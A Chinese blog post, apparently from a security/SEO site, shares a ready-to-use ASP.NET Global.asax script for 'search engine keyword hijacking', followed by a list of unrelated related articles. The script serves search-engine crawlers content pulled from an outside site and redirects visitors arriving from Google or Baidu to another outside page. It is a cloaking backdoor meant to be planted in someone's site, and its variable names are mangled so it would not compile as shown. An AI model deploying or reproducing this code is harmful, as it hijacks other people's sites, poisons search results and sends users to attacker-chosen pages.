搜索引擎关键词劫持之.net篇

简介: 摘要:蛋疼写的,有需要的就拿去,注意要保存为Global.asax。 重要说明:为避免编码问题,请在劫持页面(data_url)指向页面加入meta标记来指明编码,如 meta content=text/html; charset=utf-8 http-equiv=Content-Type/ 来指明是UTF-8编码,以避免乱码问题。

摘要:蛋疼写的,有需要的就拿去,注意要保存为Global.asax。 重要说明:为避免编码问题,请在劫持页面(data_url)指向页面加入meta标记来指明编码,如 meta content=text/html; charset=utf-8 http-equiv=Content-Type/ 来指明是UTF-8编码,以避免乱码问题。 %@A...

蛋疼写的,有需要的就拿去,注意要保存为Global.asax。
重要说明:为避免编码问题,请在劫持页面(data_url)指向页面加入meta标记来指明编码,如

<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>

来指明是UTF-8编码,以避免乱码问题。

            <%@ Application Language="C#" %> 
            <script runat="server"> 
             
            void Application_Start(object sender, EventArgs e) 
            { 
            //在应用程序启动时运行的代码 
            } 
            void Application_End(object sender, EventArgs e) 
            { 
            //在应用程序关闭时运行的代码 
            } 
             
            void Application_Error(object sender, EventArgs e) 
            { 
            //在出现未处理的错误时运行的代码 
            } 
             
            void Session_Start(object sender, EventArgs e) 
            { 
            //在新会话启动时运行的代码 
            //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent); 
            string data_url = "http://www.yunsec.net";//要展示给搜索引擎的页面 
            string redirect_url="http://www.yunsec.net/1.asp";//从搜索引擎点击进来跳转的页面 
            if (is_spider()) 
            { 
            HttpContext.Current.Response.Clear(); 
            HttpContext.Current.Response.BinaryWrite(get_data(data_url)); 
            HttpContext.Current.Response.End(); 
            } 
            else if(is_from_search()) 
            { 
            HttpContext.Current.Response.Redirect(redirect_url, true); 
            } 
            else 
            { 
            //HttpContext.Current.Response.Write(HttpContext.Current.Request.UserAgent); 
            } 
            } 
             
            void Session_End(object sender, EventArgs e) 
            { 
            //在会话结束时运行的代码。 
            // 注意: 只有在 Web.config 文件中的 sessionstate 模式设置为 
            // InProc 时,才会引发 Session_End 事件。如果会话模式 
            //设置为 StateServer 或 SQLServer,则不会引发该事件。 
             
            } 
            public bool is_spider() 
            { 
            string spider_flag = "googlebot|baiduspider|sogou|yahoo|soso";//这里添加搜索引擎user-agent标识 
            string[] spider_flagspider_flag_arr = spider_flag.Split('|'); 
            string user_agent=HttpContext.Current.Request.UserAgent; 
            foreach (string tmp_flag in spider_flag_arr) 
            { 
            if (user_agent.ToLower().IndexOf(tmp_flag.ToLower())!=-1) { return true; } 
            } 
            return false; 
            } 
            public bool is_from_search() 
            { 
            if (HttpContext.Current.Request.UrlReferrer==null) 
            { 
            return false; 
            } 
            else 
            { 
            string page_ref = HttpContext.Current.Request.UrlReferrer.ToString(); 
            string search_flag = "google|baidu|sogou|yahoo|soso"; //这里添加搜索引擎url标识 
            string[] search_flagsearch_flag_arr = search_flag.Split('|'); 
            foreach (string tmp_flag in search_flag_arr) 
            { 
            if (page_ref.ToLower().IndexOf(tmp_flag.ToLower()) != -1) { return true; } 
            } 
            return false; 
            } 
            } 
            public byte[] get_data(string url) 
            { 
            System.Net.WebClient wc = new System.Net.WebClient(); 
            byte[] data = wc.DownloadData(url); 
            return data; 
            } 
             
            </script>

 

相关文章
|
2月前
|
数据采集
爬虫案例—爬取ChinaUnix.net论坛板块标题
爬虫案例—爬取ChinaUnix.net论坛板块标题
60 0
爬虫案例—爬取ChinaUnix.net论坛板块标题
|
6月前
|
数据采集 安全 C#
.NET快速实现网页数据抓取
今天我们来讲讲如何使用.NET开源(MIT License)的轻量、灵活、高性能、跨平台的分布式网络爬虫框架DotnetSpider来快速实现网页数据抓取功能。
|
搜索推荐 UED 索引
Backdata.net 一个新的搜索引擎
Backdata.net 是一个搜索引擎
245 1
|
7月前
|
数据采集 安全 JavaScript
百度搜索:蓝易云【高防IP如何防止爬虫和Web攻击?】
总之,高防IP通过多种技术和策略的综合应用,提供了强大的防御能力,可有效防止爬虫和Web攻击对服务器的威胁。它能够识别恶意流量、限制访问、拦截攻击和保护服务器的稳定性和安全性。
67 0
|
Web App开发 搜索推荐 .NET
识别真假搜索引擎(搜索蜘蛛)方法(baidu,google,Msn,sogou,soso等)
http://www.useragentstring.com/pages/useragentstring.php   今天分析研究了两个网站的 Apache 日志,分析日志虽然很无聊,但却是很有意义的事情,比如跟踪 SPAM 的 User Agent。
3574 0
|
搜索推荐 UED SEO
关键词优化网站排名www.20200824.com
关键词优化网站排名https://www.20200824.com/category-2.html
200 0
|
算法 前端开发 JavaScript
浅谈Google蜘蛛抓取的工作原理(02)
浅谈Google蜘蛛抓取的工作原理
398 0
浅谈Google蜘蛛抓取的工作原理(02)
|
存储 JavaScript 前端开发
浅谈Google蜘蛛抓取的工作原理(01)
浅谈Google蜘蛛抓取的工作原理
501 0
浅谈Google蜘蛛抓取的工作原理(01)
|
存储 数据采集 自然语言处理
怎么快速的让网站被收录?搜索引擎的工作原理
要想在搜索引擎中有好的排名表现,网站收录是基础。另一方面,页面收录的数量级也代表了网站的整体质量。在我看来,要想收录百度网站,首先要了解搜索引擎的工作原理,这样才能迎合搜索规则,让网站收录达到理想状态。
怎么快速的让网站被收录?搜索引擎的工作原理
|
机器学习/深度学习 人工智能 自然语言处理
搜索引擎工作原理你是否了解?做SEO的有必要看看
从事SEO(搜索引擎优化)工作的人可以比喻成搜索引擎的贴身管家,作为一名合格称职的管家必须要了解所服务对象的习性,爱好,健康程度等。 SEO服务的对象是搜索引擎,必须对它的运行规律、工作原理、习性、优缺点等都铭记在心,多多实践操作,平时实践的越多,经验也就越丰富。 搜索引擎是由人创造出来的,所以也是有理可寻的。搜索引擎工作过程有主要的三段工作流程,爬行、预处理及服务输出。
190 0